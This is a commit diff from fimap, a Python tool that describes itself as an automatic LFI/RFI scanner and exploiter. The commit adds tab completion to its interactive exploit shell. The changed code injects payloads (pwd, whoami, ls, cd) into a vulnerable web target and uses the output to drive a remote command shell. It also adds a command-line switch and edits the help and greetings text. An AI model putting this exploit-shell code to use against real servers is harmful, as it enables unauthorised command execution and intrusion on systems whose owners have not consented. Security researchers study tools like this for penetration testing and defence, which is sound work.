Commit b3377d4d authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com
Browse files

Added Tab-Completation for exploit-mode.

parent e7353746
...@@ -180,15 +180,56 @@ class codeinjector(baseClass): ...@@ -180,15 +180,56 @@ class codeinjector(baseClass):
if (type(attack) == str): if (type(attack) == str):
if (attack == "fimap_shell"): if (attack == "fimap_shell"):
tab_choice = []
ls_cmd = None
def complete(txt, state):
for tab in tab_choice:
if tab.startswith(txt):
if not state: return tab
else: state -= 1
if (self.config["p_tabcomplete"]):
self._log("Setting up tab-completation...", self.LOG_DEBUG)
try:
import readline
readline.parse_and_bind("tab: complete")
readline.set_completer(complete)
if (isUnix):
ls_cmd = "ls -m"
else:
ls_cmd = "dir"
except:
self._log("Failed to setup readline module!", self.LOG_WARN)
self._log("Falling back to default exploit-shell.", self.LOG_WARN)
cmd = "" cmd = ""
print "Please wait - Setting up shell (one request)..." print "Please wait - Setting up shell (one request)..."
#pwd_cmd = item.generatePayload("pwd;whoami") #pwd_cmd = item.generatePayload("pwd;whoami")
commands = (xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix))
commands = [xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix)]
if (ls_cmd != None):
commands.append(ls_cmd)
pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix)) pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix))
tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip() tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip()
curdir = tmp.split("\n")[0].strip() curdir = tmp.split("\n")[0].strip()
curusr = tmp.split("\n")[1].strip() curusr = tmp.split("\n")[1].strip()
if (ls_cmd != None):
dir_content = ",".join(tmp.split("\n")[2:])
tab_choice = []
for c in dir_content.split(","):
c = c.strip()
if (c != ""):
tab_choice.append(c)
if (curusr) == "": if (curusr) == "":
curusr = "fimap" curusr = "fimap"
...@@ -205,10 +246,27 @@ class codeinjector(baseClass): ...@@ -205,10 +246,27 @@ class codeinjector(baseClass):
userload = item.generatePayload(cmds) userload = item.generatePayload(cmds)
code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix) code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix)
if (cmd.startswith("cd ")): if (cmd.startswith("cd ")):
# Get Current Directory...
commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix)) commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix))
cmds = xml2config.concatCommands(commands, isUnix) cmds = xml2config.concatCommands(commands, isUnix)
cmd = item.generatePayload(cmds) cmd = item.generatePayload(cmds)
curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip() curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
# Refresh Tab-Complete Cache...
if (ls_cmd != None):
self._log("Refreshing Tab-Completation cache...", self.LOG_DEBUG)
commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), ls_cmd)
cmds = xml2config.concatCommands(commands, isUnix)
cmd = item.generatePayload(cmds)
tab_cache = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
if (ls_cmd != None):
dir_content = ",".join(tab_cache.split("\n"))
tab_choice = []
for c in dir_content.split(","):
c = c.strip()
if (c != ""):
tab_choice.append(c)
print code.strip() print code.strip()
except KeyboardInterrupt: except KeyboardInterrupt:
print "\nCancelled by user." print "\nCancelled by user."
......
...@@ -40,7 +40,8 @@ __version__ = "09_svn" ...@@ -40,7 +40,8 @@ __version__ = "09_svn"
config = {} config = {}
head = "fimap v.%s by Iman Karim - Automatic LFI/RFI scanner and exploiter"%__version__ head = "\nfimap v.%s by Iman Karim (fimap.dev@gmail.com)\n"%__version__ +\
"~ Automatic LFI/RFI scanner and exploiter ~\n"
pluginlist = "http://fimap.googlecode.com/svn/wiki/PluginList.wiki" pluginlist = "http://fimap.googlecode.com/svn/wiki/PluginList.wiki"
defupdateurl = "http://fimap.googlecode.com/svn/trunk/src/config/" defupdateurl = "http://fimap.googlecode.com/svn/trunk/src/config/"
...@@ -100,6 +101,7 @@ def show_help(AndQuit=False): ...@@ -100,6 +101,7 @@ def show_help(AndQuit=False):
print "## Attack Kit:" print "## Attack Kit:"
print " -x , --exploit Starts an interactive session where you can" print " -x , --exploit Starts an interactive session where you can"
print " select a target and do some action." print " select a target and do some action."
print " -T , --tab-complete Enables TAB-Completation in exploit mode. Needs readline module."
print "## Disguise Kit:" print "## Disguise Kit:"
print " -A , --user-agent=UA The User-Agent which should be sent." print " -A , --user-agent=UA The User-Agent which should be sent."
print " --http-proxy=PROXY Setup your proxy with this option. But read this facts:" print " --http-proxy=PROXY Setup your proxy with this option. But read this facts:"
...@@ -160,10 +162,13 @@ def show_greetings(): ...@@ -160,10 +162,13 @@ def show_greetings():
print " - Exorzist" print " - Exorzist"
print " - IngoWer" print " - IngoWer"
print " - Invisible" print " - Invisible"
print " - MarcosKhan"
print " - Rita"
print " - Ruun" print " - Ruun"
print " - Sticks"
print " - Satyros"
print " - Yasmin" print " - Yasmin"
print " Special Greetings to the whole Netherlands" print " Special Greetings to the whole Netherlands"
print "## You guys and lads are epic."
sys.exit(0) sys.exit(0)
def show_ip(): def show_ip():
...@@ -222,7 +227,8 @@ if __name__ == "__main__": ...@@ -222,7 +227,8 @@ if __name__ == "__main__":
config["p_color"] = False config["p_color"] = False
config["p_mergexml"] = None config["p_mergexml"] = None
config["p_results_per_query"] = 100 config["p_results_per_query"] = 100
config["p_googlesleep"] = 5; config["p_googlesleep"] = 5;
config["p_tabcomplete"] = False;
doPluginsShow = False doPluginsShow = False
doRFITest = False doRFITest = False
doInternetInfo = False doInternetInfo = False
...@@ -244,8 +250,8 @@ if __name__ == "__main__": ...@@ -244,8 +250,8 @@ if __name__ == "__main__":
"show-my-ip" , "enable-blind", "http-proxy=" , "ttl=" , "post=" , "no-auto-detect", "show-my-ip" , "enable-blind", "http-proxy=" , "ttl=" , "post=" , "no-auto-detect",
"plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=", "plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=",
"googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=", "googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=",
"dot-trunc-also-unix"] "tab-complete" , "dot-trunc-also-unix"]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CID", longSwitches) optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDT", longSwitches)
startExploiter = False startExploiter = False
...@@ -325,6 +331,8 @@ if __name__ == "__main__": ...@@ -325,6 +331,8 @@ if __name__ == "__main__":
config["p_dot_trunc_ratio"] = float(v) config["p_dot_trunc_ratio"] = float(v)
if (k in ("--dot-trunc-also-unix",)): if (k in ("--dot-trunc-also-unix",)):
config["p_dot_trunc_only_win"] = False config["p_dot_trunc_only_win"] = False
if (k in ("-T", "--tab-complete")):
config["p_tabcomplete"] = True
#if (k in("-f", "--exploit-filter")): #if (k in("-f", "--exploit-filter")):
# config["p_exploit_filter"] = v # config["p_exploit_filter"] = v
...@@ -335,7 +343,11 @@ if __name__ == "__main__": ...@@ -335,7 +343,11 @@ if __name__ == "__main__":
config["PLUGINMANAGER"] = plugman config["PLUGINMANAGER"] = plugman
if startExploiter: if startExploiter:
list_results() try:
list_results()
except KeyboardInterrupt:
print "\n\nYou killed me brutally. Wtf!\n\n"
sys.exit(0)
except getopt.GetoptError, err: except getopt.GetoptError, err:
print (err) print (err)
......
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment